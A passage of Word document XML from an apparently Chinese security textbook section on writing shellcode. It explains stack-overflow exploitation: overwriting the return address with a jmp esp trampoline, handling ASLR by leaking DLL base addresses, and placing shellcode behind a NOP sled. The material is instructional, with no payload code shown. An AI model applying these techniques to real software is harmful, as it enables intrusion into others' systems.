          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击脚本运行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162BAB0E" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00253195" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00253195">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00253195">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">.8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00253195">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写</w:t>
      </w:r>
      <w:r w:rsidRPr="00253195">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244DF514"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2.8.1 shellcode概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBFD48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shellcode这个专用术语来</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通称缓冲区溢出攻击中植入进程的代码。这段代码可以是出于恶作剧目的的弹出一个消息框，也可以是出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行，甚至是出于破坏目的的格式化硬盘等。请注意本章讨论的shellcode是这种广义上的植入进程的代码，而不是狭义上的仅仅用来获得shell的代码。shellcode往往需要用汇编语言编写，并转换成二进制机器码，其内容和长度经常还会受到很多苛刻限制，故开发和调试的难度很高。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234A590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一般伴随着shellcode出现的名词还有exploit。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>植入代码之前需要做大量的调试工作，例如，弄清楚程序有几个输入点，这些输入将最终会当作哪个函数的第几个参数读入到内存的哪一个区域，哪一个输入会造成栈溢出，在复制到栈区的时候对这些数据有没有额外的限制等。调试之后还要计算函数返回地址距离缓冲区的偏移并淹没之，选择指令的地址，最终制作出一个有攻击效果的“承载”着shellcode的输入字符串。这个代码植入的过程就是漏洞利用，也就是exploit。exploit一般以段代码的形式出现，用于生成攻击性的网络数据包或者其他形式的攻击性输入。expliot的核心是淹没返回地址，劫持进程的控制权，之后跳转去执行shellcode。与shellcode具有一定的通用性不同，exploit 往往是针对特定漏洞而言的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接下来开始介绍编写shellcode需要注意的事项和难点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76471F29"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2.8.2 定位shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183672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要想让shellcode运行起来，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当我们可以用越界的字符完全控制返回地址后，需要将返回地址改写成shellcode在内存中的起始地址。在实际的漏洞利用过程中，由于动态链接库的装入和卸载</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、ALSR地址随机化</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等原因，进程的函数栈帧很有可能会产生“移位”，即shellcode在内存中的地址是会动态变化的，因此将返回地址简单地覆盖成一个定值的做法往往不能让exploit奏效</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>要想使exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功率变高，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们必须想出一种方法能够在程序运行时动态定位栈中的shellcode。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917FA9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一般情况下，ESP寄存器中的地址总是指向系统栈中</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>且不会被溢出的数据破坏。函数返回时，ESP 所指的位置恰好是我们所淹没的返回地址的下一个位置，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如下图所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F51CAB" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3076A901" wp14:editId="533E46EF">
            <wp:extent cx="5274310" cy="2553335"/>
            <wp:effectExtent l="0" t="0" r="254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553335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51598D3C" w14:textId="16DDC90F"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.3</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp指令定位shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738C0AB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由于ESP寄存器在函数返回后不被溢出数据干扰，且始终指向返回地址之后的位置，我们可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行动态定位。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83F91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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用内存中任意一个jmp esp指令的地址覆盖函数返回地址，而不是原来用手工查出的shellcode起始地址直接覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8469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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数返间后被重定向去执行内存中的这条jmp esp指令</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而不是直接开始执行shellcode。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB806A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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>由于esp在函数返回时仍指向栈区(函数返回地址之后)，jmp esp指令被执行后，处理器会到栈区函数返回地址之后的地方取指令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E36C8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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重新布置shellcode。在淹没函数返回地址后，继续淹没一片栈空间。将缓冲区前边一段地方用任意数据填充，把shellcode恰好摆放在函数返回地址之后。这样，jmp esp指令执行过后会恰好跳进shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC6BA8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这种定位shellcode的方法使用进程空间里一条jmp esp指令作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“跳板”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，不论栈帧怎么</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“移位”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，都能够精确地跳回栈区，从而适应程序运行中shellcode内存地址的动态变化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EDA35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所以，上面方法的一个关键就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>首先获得进程空间内一条jmp esp指令的地址作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“跳板”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。除了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件的代码被读入内存空间，一些经常被用到的动态链接库也将会一同被映射到内存。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这些动态链接库中含有jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp指令，接下来重点就是定位动态链接库中jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp的具体地址。如果ALSR地址随机化没有开启，则这个地址是固定的，通过动态调试可以很容易的找出来。如果开启了地址随机化，就需要先泄露出程序在运行时动态链接库加载的基地址，然后通过偏移计算出jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>esp的具体地址。这样，定位shellcode的问题就得到了解决。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189FBDC3"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2.8.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellcode放置的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F9910"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shellcode应该放哪也是一个重要的问题，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果选用jmp esp作为定位shellcode的跳板，那么在函数返回后要根据缓冲区大小、所需shellcode长短等实际情况灵活地布置缓冲区。送入缓冲区的数据可以分为以下几种。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DFCFA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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>填充物</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：除了0x00，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以是任何值</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>般用NOP指令对应的0x90来填充缓冲区，并把shellcode布置于其后</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样即使不能准确地跳转到shellcode的开始，只要能跳进填充区，处理器最终也能顺序执行到shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2D450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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>淹没返回地址的数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以是跳转指令的地址、shellcode 起始地址，甚至是一个近似的shellcode的地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（这个近似地址必须在shellcode之前，且地址后面一直到shellcode处都是无用的指令）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD186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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可执行的机器代码。在缓冲区中怎样摆放shellcode对exploit的成功至关重要，shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可能只</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有几十个字节，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>只要可控制的缓冲区到返回地址的距离够大，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>位于函数返回地址之前</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，否则必须放到返回地址之后。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525DBD2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一个实用的shellcode往往需要几百个字节</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样大范围地破坏前栈帧数据有可能引发一些其他问题。例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数返回前用到了前栈帧的数据，随意的覆盖可能导致程序异常，此时就只能去尝试覆盖SEH异常处理结构了；此外，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>若想在执行完shellcode后通过修复寄存器的值，让函数正常返回继续执行原程序，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不能随意破坏前栈帧的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E283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当缓冲区较大时，倾向于把shellcode布置在缓冲区内。这样做有以下好处。</w:t>
      </w:r>
